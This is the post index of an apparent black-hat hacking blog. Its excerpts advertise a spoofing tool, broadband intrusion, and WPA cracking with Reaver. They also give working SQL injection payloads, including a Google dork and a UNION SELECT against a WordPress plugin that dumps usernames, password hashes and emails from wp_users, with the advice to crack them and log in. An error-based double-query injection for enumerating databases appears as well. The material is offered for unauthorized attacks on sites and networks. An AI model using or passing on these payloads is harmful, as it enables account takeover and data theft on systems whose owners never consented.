Wednesday, November 5, 2014

BBHH Spoofer tool Download & Documentation

Bangladesh Black HAT Hackers Spoofing Tool

Read more…

Friday, January 17, 2014

Wordpress Site hacking Via SQLi



dork : inurl:/wp-content/plugins/formcraft/form.php?id=

exploit link :

form.php?id=3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_pass,0x3a,user_email),5,6,7,8,9,10,11 FROM wp_users--

Username & Password will appear. Crack the pass then login & do whatever you want :)

Read more…

Saturday, March 30, 2013

How to hack Broadband


Step 1: Download any port Scanner (i preffer Super Scan or IPscanner)

Step 2: First Get your ip from
CODE www.whatismyip.com
Asume your IP to be 59.x.x.17

Step 3: copy your ip in IPscanner Software and scan for alive IPs in the below range

Read more…

Double query Sql Injection


Database :::
whatever.com/index.php?id=myass and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

Read more…

How to crack WPA networks with Reaver


1. Boot into BackTrack mode. Place your pre-made BackTrack Live DVD into your DVD drive. When BackTrack prompts you to choose from a selection of boot modes, choose “BackTrack Text – Default Boot Text Mode” and hit Enter. After a while, BackTrack will take you to the command line prompt. At the command line prompt, type startx and hit Enter. You will then be taken into a graphical UI of BackTrack.

Read more…